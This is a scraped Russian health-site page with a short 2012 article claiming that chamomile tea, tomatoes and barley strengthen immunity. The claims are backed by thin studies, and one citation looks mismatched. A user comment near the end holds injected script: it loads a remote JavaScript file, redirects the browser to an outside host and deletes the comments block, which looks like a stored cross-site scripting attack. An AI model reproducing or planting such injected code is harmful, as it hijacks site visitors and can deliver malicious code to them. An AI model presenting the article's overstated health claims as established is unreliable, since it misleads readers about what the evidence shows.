Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 продукта для иммунитета  >>  3 продукта для иммунитета
 
Обратная связь
 

3 продукта для иммунитета

Размер шрифта
26 января 2012 08:24
  • google_analytics: false
  • Нравится

Ромашковый чай, помидоры и ячмень для людей, которые не хотят болеть.

1

Ромашковый чай

Ученые обнаружили, что ромашковый чай существенно увеличивает присутствие гиппурата в моче, который является продуктом распада растительных фенолов (карболовая кислота). Фенолы увеличивают антибактериальную активность в организме. Это объясняет тот факт, что ромашковый чай помогает справиться с простудой и преодолеть инфекции. Исследование было опубликовано в 2005 году в журнале Journal of Agricultural and Food Chemistry.

Помидоры

1

Томаты содержат ликопены – каротиноиды, которые выступают в роли антиоксидантов в организме. Это было установлено в ходе небольшого эксперимента на добровольцах. 10 женщин были разделены на две группы. Первая получала томатное пюре в течение 21 дня, из рациона второй группы помидоры были исключены. Выяснилось, что ДНК лимфоцитов (белые кровяные тельца) женщин первой группы получили меньше повреждений. Другими словами, ликопены в томатах защищают клетки от окислительного стресса. Исследование было опубликовано в 1999 году в American Journal of Clinical Nutrition.

Ячмень

1

Этот злак богат бета-глюканами – полисахаридами, которые увеличивают активность макрофагов. Бета-глюкан запускает защитный процесс для кожных макрофагов – клеток Лангерганса. Клетки Лангерганса осуществляют защиту кожи не только от локальной инфекции, но и от злокачественных новообразований. Считается, что это свойство бета-глюкана можно использовать для лечения акне. Исследование было опубликовано в журнале Journal of the Mechanical Behavior of Biomedical Materials.


Сюжеты по теме:
Еда для иммунитета. Продукты-помощники

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Разрушители иммунитета. Что лишает вас защиты от болезней   Что можно приносить в больницу раковым больным   Еда против паразитов   Сахарный запой. Почему так сложно отказаться от сахара?  
01 июля 2013Сладкая парочка против рака простаты! Соя + помидор! 12 ноября 2012Старческие болезни больше не страшны
 
28 сентября 2012Наркоманов больше не будет! 22 августа 2012Иммунная система мешает побороть туберкулез!
 

Слайдшоу

1
Как хранить еду, чтобы тратить меньше денег 7 признаков, что ваш иммунитет сдает!
Лучшая и худшая еда для энергии Еда для плоского живота. Часть 2
Супереда для супериммунитета этой зимой! Лучшая еда для женщин. Часть 2
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.